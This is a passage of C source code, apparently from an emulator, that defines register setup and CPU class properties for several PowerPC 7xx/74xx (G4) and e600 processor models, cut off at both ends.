&spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_HID1, "HID1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_HID2, "HID2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Memory management */ gen_low_BATs(env); gen_high_BATs(env); gen_6xx_7xx_soft_tlb(env, 64, 2); init_excp_7x5(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc6xx_irq_init(env_archcpu(env)); } POWERPC_FAMILY(755)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 755"; pcc->init_proc = init_proc_755; pcc->check_pow = check_pow_hid0; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_FRSQRTE | PPC_FLOAT_STFIWX | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE | PPC_MEM_TLBSYNC | PPC_6xx_TLB | PPC_SEGMENT | PPC_EXTERN; pcc->msr_mask = (1ull << MSR_POW) | (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_EP) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_PMM) | (1ull << MSR_RI) | (1ull << MSR_LE); pcc->mmu_model = POWERPC_MMU_SOFT_6xx; pcc->excp_model = POWERPC_EXCP_7x5; pcc->bus_model = PPC_FLAGS_INPUT_6xx; pcc->flags = POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_PMM | POWERPC_FLAG_BUS_CLK; } static void init_proc_7400(CPUPPCState *env) { gen_spr_ne_601(env); gen_spr_sdr1(env); gen_spr_7xx(env); /* Time base */ gen_tbl(env); /* 74xx specific SPR */ gen_spr_74xx(env); /* XXX : not implemented */ spr_register(env, SPR_UBAMR, "UBAMR", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); /* XXX: this seems not implemented on all revisions. */ /* XXX : not implemented */ spr_register(env, SPR_MSSCR1, "MSSCR1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Thermal management */ gen_spr_thrm(env); /* Memory management */ gen_low_BATs(env); init_excp_7400(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc6xx_irq_init(env_archcpu(env)); } POWERPC_FAMILY(7400)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 7400 (aka G4)"; pcc->init_proc = init_proc_7400; pcc->check_pow = check_pow_hid0; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_FSQRT | PPC_FLOAT_FRSQRTE | PPC_FLOAT_STFIWX | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBA | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE | PPC_MEM_TLBSYNC | PPC_MEM_TLBIA | PPC_SEGMENT | PPC_EXTERN | PPC_ALTIVEC; pcc->msr_mask = (1ull << MSR_VR) | (1ull << MSR_POW) | (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_EP) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_PMM) | (1ull << MSR_RI) | (1ull << MSR_LE); pcc->mmu_model = POWERPC_MMU_32B; pcc->handle_mmu_fault = ppc_hash32_handle_mmu_fault; pcc->excp_model = POWERPC_EXCP_74xx; pcc->bus_model = PPC_FLAGS_INPUT_6xx; pcc->flags = POWERPC_FLAG_VRE | POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_PMM | POWERPC_FLAG_BUS_CLK; } static void init_proc_7410(CPUPPCState *env) { gen_spr_ne_601(env); gen_spr_sdr1(env); gen_spr_7xx(env); /* Time base */ gen_tbl(env); /* 74xx specific SPR */ gen_spr_74xx(env); /* XXX : not implemented */ spr_register(env, SPR_UBAMR, "UBAMR", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); /* Thermal management */ gen_spr_thrm(env); /* L2PMCR */ /* XXX : not implemented */ spr_register(env, SPR_L2PMCR, "L2PMCR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* LDSTDB */ /* XXX : not implemented */ spr_register(env, SPR_LDSTDB, "LDSTDB", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Memory management */ gen_low_BATs(env); init_excp_7400(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc6xx_irq_init(env_archcpu(env)); } POWERPC_FAMILY(7410)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 7410 (aka G4)"; pcc->init_proc = init_proc_7410; pcc->check_pow = check_pow_hid0; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_FSQRT | PPC_FLOAT_FRSQRTE | PPC_FLOAT_STFIWX | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBA | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE | PPC_MEM_TLBSYNC | PPC_MEM_TLBIA | PPC_SEGMENT | PPC_EXTERN | PPC_ALTIVEC; pcc->msr_mask = (1ull << MSR_VR) | (1ull << MSR_POW) | (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_EP) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_PMM) | (1ull << MSR_RI) | (1ull << MSR_LE); pcc->mmu_model = POWERPC_MMU_32B; pcc->handle_mmu_fault = ppc_hash32_handle_mmu_fault; pcc->excp_model = POWERPC_EXCP_74xx; pcc->bus_model = PPC_FLAGS_INPUT_6xx; pcc->flags = POWERPC_FLAG_VRE | POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_PMM | POWERPC_FLAG_BUS_CLK; } static void init_proc_7440(CPUPPCState *env) { gen_spr_ne_601(env); gen_spr_sdr1(env); gen_spr_7xx(env); /* Time base */ gen_tbl(env); /* 74xx specific SPR */ gen_spr_74xx(env); /* XXX : not implemented */ spr_register(env, SPR_UBAMR, "UBAMR", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); /* LDSTCR */ /* XXX : not implemented */ spr_register(env, SPR_LDSTCR, "LDSTCR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* ICTRL */ /* XXX : not implemented */ spr_register(env, SPR_ICTRL, "ICTRL", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* MSSSR0 */ /* XXX : not implemented */ spr_register(env, SPR_MSSSR0, "MSSSR0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* PMC */ /* XXX : not implemented */ spr_register(env, SPR_7XX_PMC5, "PMC5", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_7XX_UPMC5, "UPMC5", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_7XX_PMC6, "PMC6", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_7XX_UPMC6, "UPMC6", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); /* Memory management */ gen_low_BATs(env); gen_74xx_soft_tlb(env, 128, 2); init_excp_7450(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc6xx_irq_init(env_archcpu(env)); } POWERPC_FAMILY(7440)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 7440 (aka G4)"; pcc->init_proc = init_proc_7440; pcc->check_pow = check_pow_hid0_74xx; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_FSQRT | PPC_FLOAT_FRSQRTE | PPC_FLOAT_STFIWX | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBA | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE | PPC_MEM_TLBSYNC | PPC_MEM_TLBIA | PPC_74xx_TLB | PPC_SEGMENT | PPC_EXTERN | PPC_ALTIVEC; pcc->msr_mask = (1ull << MSR_VR) | (1ull << MSR_POW) | (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_EP) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_PMM) | (1ull << MSR_RI) | (1ull << MSR_LE); pcc->mmu_model = POWERPC_MMU_SOFT_74xx; pcc->excp_model = POWERPC_EXCP_74xx; pcc->bus_model = PPC_FLAGS_INPUT_6xx; pcc->flags = POWERPC_FLAG_VRE | POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_PMM | POWERPC_FLAG_BUS_CLK; } static void init_proc_7450(CPUPPCState *env) { gen_spr_ne_601(env); gen_spr_sdr1(env); gen_spr_7xx(env); /* Time base */ gen_tbl(env); /* 74xx specific SPR */ gen_spr_74xx(env); /* Level 3 cache control */ gen_l3_ctrl(env); /* L3ITCR1 */ /* XXX : not implemented */ spr_register(env, SPR_L3ITCR1, "L3ITCR1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* L3ITCR2 */ /* XXX : not implemented */ spr_register(env, SPR_L3ITCR2, "L3ITCR2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* L3ITCR3 */ /* XXX : not implemented */ spr_register(env, SPR_L3ITCR3, "L3ITCR3", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* L3OHCR */ /* XXX : not implemented */ spr_register(env, SPR_L3OHCR, "L3OHCR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_UBAMR, "UBAMR", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); /* LDSTCR */ /* XXX : not implemented */ spr_register(env, SPR_LDSTCR, "LDSTCR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* ICTRL */ /* XXX : not implemented */ spr_register(env, SPR_ICTRL, "ICTRL", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* MSSSR0 */ /* XXX : not implemented */ spr_register(env, SPR_MSSSR0, "MSSSR0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* PMC */ /* XXX : not implemented */ spr_register(env, SPR_7XX_PMC5, "PMC5", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_7XX_UPMC5, "UPMC5", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_7XX_PMC6, "PMC6", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_7XX_UPMC6, "UPMC6", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); /* Memory management */ gen_low_BATs(env); gen_74xx_soft_tlb(env, 128, 2); init_excp_7450(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc6xx_irq_init(env_archcpu(env)); } POWERPC_FAMILY(7450)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 7450 (aka G4)"; pcc->init_proc = init_proc_7450; pcc->check_pow = check_pow_hid0_74xx; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_FSQRT | PPC_FLOAT_FRSQRTE | PPC_FLOAT_STFIWX | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBA | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE | PPC_MEM_TLBSYNC | PPC_MEM_TLBIA | PPC_74xx_TLB | PPC_SEGMENT | PPC_EXTERN | PPC_ALTIVEC; pcc->msr_mask = (1ull << MSR_VR) | (1ull << MSR_POW) | (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_EP) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_PMM) | (1ull << MSR_RI) | (1ull << MSR_LE); pcc->mmu_model = POWERPC_MMU_SOFT_74xx; pcc->excp_model = POWERPC_EXCP_74xx; pcc->bus_model = PPC_FLAGS_INPUT_6xx; pcc->flags = POWERPC_FLAG_VRE | POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_PMM | POWERPC_FLAG_BUS_CLK; } static void init_proc_7445(CPUPPCState *env) { gen_spr_ne_601(env); gen_spr_sdr1(env); gen_spr_7xx(env); /* Time base */ gen_tbl(env); /* 74xx specific SPR */ gen_spr_74xx(env); /* LDSTCR */ /* XXX : not implemented */ spr_register(env, SPR_LDSTCR, "LDSTCR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* ICTRL */ /* XXX : not implemented */ spr_register(env, SPR_ICTRL, "ICTRL", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* MSSSR0 */ /* XXX : not implemented */ spr_register(env, SPR_MSSSR0, "MSSSR0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* PMC */ /* XXX : not implemented */ spr_register(env, SPR_7XX_PMC5, "PMC5", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_7XX_UPMC5, "UPMC5", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_7XX_PMC6, "PMC6", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_7XX_UPMC6, "UPMC6", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); /* SPRGs */ spr_register(env, SPR_SPRG4, "SPRG4", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_USPRG4, "USPRG4", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); spr_register(env, SPR_SPRG5, "SPRG5", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_USPRG5, "USPRG5", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); spr_register(env, SPR_SPRG6, "SPRG6", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_USPRG6, "USPRG6", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); spr_register(env, SPR_SPRG7, "SPRG7", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_USPRG7, "USPRG7", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); /* Memory management */ gen_low_BATs(env); gen_high_BATs(env); gen_74xx_soft_tlb(env, 128, 2); init_excp_7450(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc6xx_irq_init(env_archcpu(env)); } POWERPC_FAMILY(7445)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 7445 (aka G4)"; pcc->init_proc = init_proc_7445; pcc->check_pow = check_pow_hid0_74xx; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_FSQRT | PPC_FLOAT_FRSQRTE | PPC_FLOAT_STFIWX | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBA | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE | PPC_MEM_TLBSYNC | PPC_MEM_TLBIA | PPC_74xx_TLB | PPC_SEGMENT | PPC_EXTERN | PPC_ALTIVEC; pcc->msr_mask = (1ull << MSR_VR) | (1ull << MSR_POW) | (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_EP) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_PMM) | (1ull << MSR_RI) | (1ull << MSR_LE); pcc->mmu_model = POWERPC_MMU_SOFT_74xx; pcc->excp_model = POWERPC_EXCP_74xx; pcc->bus_model = PPC_FLAGS_INPUT_6xx; pcc->flags = POWERPC_FLAG_VRE | POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_PMM | POWERPC_FLAG_BUS_CLK; } static void init_proc_7455(CPUPPCState *env) { gen_spr_ne_601(env); gen_spr_sdr1(env); gen_spr_7xx(env); /* Time base */ gen_tbl(env); /* 74xx specific SPR */ gen_spr_74xx(env); /* Level 3 cache control */ gen_l3_ctrl(env); /* LDSTCR */ /* XXX : not implemented */ spr_register(env, SPR_LDSTCR, "LDSTCR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* ICTRL */ /* XXX : not implemented */ spr_register(env, SPR_ICTRL, "ICTRL", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* MSSSR0 */ /* XXX : not implemented */ spr_register(env, SPR_MSSSR0, "MSSSR0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* PMC */ /* XXX : not implemented */ spr_register(env, SPR_7XX_PMC5, "PMC5", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_7XX_UPMC5, "UPMC5", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_7XX_PMC6, "PMC6", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_7XX_UPMC6, "UPMC6", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); /* SPRGs */ spr_register(env, SPR_SPRG4, "SPRG4", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_USPRG4, "USPRG4", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); spr_register(env, SPR_SPRG5, "SPRG5", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_USPRG5, "USPRG5", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); spr_register(env, SPR_SPRG6, "SPRG6", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_USPRG6, "USPRG6", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); spr_register(env, SPR_SPRG7, "SPRG7", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_USPRG7, "USPRG7", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); /* Memory management */ gen_low_BATs(env); gen_high_BATs(env); gen_74xx_soft_tlb(env, 128, 2); init_excp_7450(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc6xx_irq_init(env_archcpu(env)); } POWERPC_FAMILY(7455)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 7455 (aka G4)"; pcc->init_proc = init_proc_7455; pcc->check_pow = check_pow_hid0_74xx; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_FSQRT | PPC_FLOAT_FRSQRTE | PPC_FLOAT_STFIWX | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBA | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE | PPC_MEM_TLBSYNC | PPC_MEM_TLBIA | PPC_74xx_TLB | PPC_SEGMENT | PPC_EXTERN | PPC_ALTIVEC; pcc->msr_mask = (1ull << MSR_VR) | (1ull << MSR_POW) | (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_EP) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_PMM) | (1ull << MSR_RI) | (1ull << MSR_LE); pcc->mmu_model = POWERPC_MMU_SOFT_74xx; pcc->excp_model = POWERPC_EXCP_74xx; pcc->bus_model = PPC_FLAGS_INPUT_6xx; pcc->flags = POWERPC_FLAG_VRE | POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_PMM | POWERPC_FLAG_BUS_CLK; } #if 0 static void init_proc_7457(CPUPPCState *env) { gen_spr_ne_601(env); gen_spr_sdr1(env); gen_spr_7xx(env); /* Time base */ gen_tbl(env); /* 74xx specific SPR */ gen_spr_74xx(env); /* Level 3 cache control */ gen_l3_ctrl(env); /* L3ITCR1 */ /* XXX : not implemented */ spr_register(env, SPR_L3ITCR1, "L3ITCR1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* L3ITCR2 */ /* XXX : not implemented */ spr_register(env, SPR_L3ITCR2, "L3ITCR2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* L3ITCR3 */ /* XXX : not implemented */ spr_register(env, SPR_L3ITCR3, "L3ITCR3", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* L3OHCR */ /* XXX : not implemented */ spr_register(env, SPR_L3OHCR, "L3OHCR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* LDSTCR */ /* XXX : not implemented */ spr_register(env, SPR_LDSTCR, "LDSTCR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* ICTRL */ /* XXX : not implemented */ spr_register(env, SPR_ICTRL, "ICTRL", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* MSSSR0 */ /* XXX : not implemented */ spr_register(env, SPR_MSSSR0, "MSSSR0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* PMC */ /* XXX : not implemented */ spr_register(env, SPR_7XX_PMC5, "PMC5", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_7XX_UPMC5, "UPMC5", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_7XX_PMC6, "PMC6", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_7XX_UPMC6, "UPMC6", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); /* SPRGs */ spr_register(env, SPR_SPRG4, "SPRG4", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_USPRG4, "USPRG4", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); spr_register(env, SPR_SPRG5, "SPRG5", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_USPRG5, "USPRG5", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); spr_register(env, SPR_SPRG6, "SPRG6", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_USPRG6, "USPRG6", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); spr_register(env, SPR_SPRG7, "SPRG7", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_USPRG7, "USPRG7", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); /* Memory management */ gen_low_BATs(env); gen_high_BATs(env); gen_74xx_soft_tlb(env, 128, 2); init_excp_7450(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc6xx_irq_init(env_archcpu(env)); } POWERPC_FAMILY(7457)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 7457 (aka G4)"; pcc->init_proc = init_proc_7457; pcc->check_pow = check_pow_hid0_74xx; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_FSQRT | PPC_FLOAT_FRSQRTE | PPC_FLOAT_STFIWX | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBA | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE | PPC_MEM_TLBSYNC | PPC_MEM_TLBIA | PPC_74xx_TLB | PPC_SEGMENT | PPC_EXTERN | PPC_ALTIVEC; pcc->msr_mask = (1ull << MSR_VR) | (1ull << MSR_POW) | (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_EP) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_PMM) | (1ull << MSR_RI) | (1ull << MSR_LE); pcc->mmu_model = POWERPC_MMU_SOFT_74xx; pcc->excp_model = POWERPC_EXCP_74xx; pcc->bus_model = PPC_FLAGS_INPUT_6xx; pcc->flags = POWERPC_FLAG_VRE | POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_PMM | POWERPC_FLAG_BUS_CLK; } #endif static void init_proc_e600(CPUPPCState *env) { gen_spr_ne_601(env); gen_spr_sdr1(env); gen_spr_7xx(env); /* Time base */ gen_tbl(env); /* 74xx specific SPR */ gen_spr_74xx(env); /* XXX : not implemented */ spr_register(env, SPR_UBAMR, "UBAMR", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); /* 